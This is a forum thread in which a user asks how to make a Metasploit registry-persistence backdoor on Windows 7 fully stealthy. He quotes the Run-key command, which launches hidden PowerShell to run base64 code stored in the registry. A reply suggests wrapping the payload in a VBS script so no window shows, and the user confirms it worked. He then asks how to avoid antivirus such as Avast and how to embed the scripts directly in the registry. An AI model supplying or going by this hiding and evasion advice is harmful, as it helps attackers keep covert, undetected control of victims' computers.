Vurraz Posted February 7, 2018 Share Posted February 7, 2018 Hello, I installed a registry_persistence backdoor on my lab machine. However, the problem is that once the victim machine boots, you can see an empty cmd prompt shell standing there for 10 seconds. And if I close that shell, then I won't get a meterpreter shell on my Kali machine. I wish to completely hide that shell on startup, to make the backdoor stealthy. I tried tinkering with the options in the registry key, but it didn't help. This is the data written to the registry key of the backdoor by default: (HKCU/Software/Microsoft/Windows/CurrentVersion/Run) %COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:Software\8GU6R71p').GetValue('Jg8XwoGx'))))" I'm testing this on Windows 7 Enterprise. Quote Link to comment Share on other sites More sharing options...
thoregem Posted February 8, 2018 Share Posted February 8, 2018 The problem with most windows backdoors (including reverse shells) is that they need the window open to function. Your best bet is going to be to try and hide that window, so I've linked some stackexchange answers that explain how to do exactly that below. Most of these involve making the script into a vbs object, which by default run in the background on windows systems. Answer #1 Answer #2 Quote Link to comment Share on other sites More sharing options...
Vurraz Posted February 8, 2018 Author Share Posted February 8, 2018 Thank you so much. This worked. No windows is seen. I'm so grateful. I created invisible.vbs, which runs together with something.bat. The bat file is the reg key command (%COMSPEC%...). But now it seems that I will have to edit the registry_persistence.rb exploit to automatically upload invis.vbs and something.bat to the vicitm PC to make this work... Is this going to trigger the antivirus? What about Avast? Do you have a cleaner solution in mind, instead of uploading 2 files to the victim? Is it possible to write the .vbs and .bat source code DIRECTLY into the registery key, so that no file needs to be uploaded? If so, please show me how. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.